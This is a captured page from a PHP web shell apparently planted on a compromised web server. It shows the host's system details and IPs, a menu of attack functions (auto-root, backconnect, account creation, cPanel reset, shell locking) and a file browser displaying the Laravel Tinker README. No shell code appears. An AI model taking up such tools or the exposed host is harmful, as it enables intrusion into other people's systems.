Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdgamatya /
vendor /
laravel /
tinker /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxr-xr-x
LICENSE.txt
1.07
KB
-rw-r--r--
README.md
1.26
KB
-rw-r--r--
composer.json
1.18
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
<p align="center"><img src="https://laravel.com/assets/img/components/logo-tinker.svg"></p> <p align="center"> <a href="https://travis-ci.org/laravel/tinker"><img src="https://travis-ci.org/laravel/tinker.svg" alt="Build Status"></a> <a href="https://packagist.org/packages/laravel/tinker"><img src="https://poser.pugx.org/laravel/tinker/d/total.svg" alt="Total Downloads"></a> <a href="https://packagist.org/packages/laravel/tinker"><img src="https://poser.pugx.org/laravel/tinker/v/stable.svg" alt="Latest Stable Version"></a> <a href="https://packagist.org/packages/laravel/tinker"><img src="https://poser.pugx.org/laravel/tinker/license.svg" alt="License"></a> </p> ## Introduction Laravel Tinker is a powerful REPL for the Laravel framework. ## Installation To get started with Laravel Tinker, simply run: composer require laravel/tinker Next, register the `Laravel\Tinker\TinkerServiceProvider` in your `config/app.php` file: ```php 'providers' => [ // Other service providers... Laravel\Tinker\TinkerServiceProvider::class, ], ``` ## Basic Usage From your console, execute the `php artisan tinker` command. ## License Laravel Tinker is open-sourced software licensed under the [MIT license](http://opensource.org/licenses/MIT)
Close